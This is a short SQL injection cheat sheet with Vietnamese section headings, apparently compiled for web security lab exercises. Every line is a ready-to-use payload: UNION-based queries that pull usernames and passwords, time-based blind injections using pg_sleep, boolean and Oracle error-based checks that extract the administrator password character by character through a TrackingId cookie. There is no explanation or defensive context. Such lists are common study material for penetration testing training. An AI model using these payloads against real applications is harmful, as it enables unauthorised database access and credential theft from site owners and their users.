CHEATSHEET FOR SQLI
Quick Nav
CHECK SỐ CỘT
‘+UNION+SELECT+NULL,NULL—
‘+UNION+SELECT+‘abcdef’,NULL,NULL—
‘+UNION+SELECT+username,+password+FROM+users—
‘+UNION+SELECT+NULL,username||’~‘||password+FROM+users—
CHECK TIME DELAY
’ AND (SELECT pg_sleep(10)) IS NULL—
’ AND (SELECT 1 FROM pg_sleep(10)) = 1—
’ || pg_sleep(10)—
' || (select case when (select '1' from user) = '1' then pg_sleep(10) else pg_sleep(0) end)--
' || (select case when (username='administrator' AND LENGTH(password)>3) then pg_sleep(5) else pg_sleep(0) end from users)--
' || (select case when (select length(password) from users where username = 'administrator') > 2 then pg_sleep(5) else pg_sleep(0) end)--
CHECK ĐIỀU KIỆN
TrackingId=xyz’ AND ‘1’=‘1
TrackingId=xyz’ AND ‘1’=‘2
TrackingId=xyz’ AND (SELECT ‘a’ FROM users LIMIT 1)=‘a
TrackingId=xyz’ AND (SELECT ‘a’ FROM users WHERE username=‘administrator’)=‘a
TrackingId=xyz’ AND (SELECT ‘a’ FROM users WHERE username=‘administrator’ AND LENGTH(password)>1)=‘a
TrackingId=xyz’ AND (SELECT ‘a’ FROM users WHERE username=‘administrator’ AND LENGTH(password)>2)=‘a
TrackingId=xyz’ AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username=‘administrator’)=‘a
' and cast((select username from users limit 1) as int)=1--
' and cast((select password from users limit 1) as int)=1--
TrackingId=xyz'||(SELECT '')||'
TrackingId=xyz'||(SELECT '' FROM dual)||'
TrackingId=xyz'||(SELECT '' FROM users WHERE ROWNUM = 1)||'
TrackingId=xyz'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||'
TrackingId=xyz'||(SELECT CASE WHEN (1=2) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||'
TrackingId=xyz'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
TrackingId=xyz'||(SELECT CASE WHEN LENGTH(password)>1 THEN to_char(1/0) ELSE '' END FROM users WHERE username='administrator')||'
TrackingId=xyz'||(SELECT CASE WHEN LENGTH(password)>2 THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
TrackingId=xyz'||(SELECT CASE WHEN SUBSTR(password,1,1)='a' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'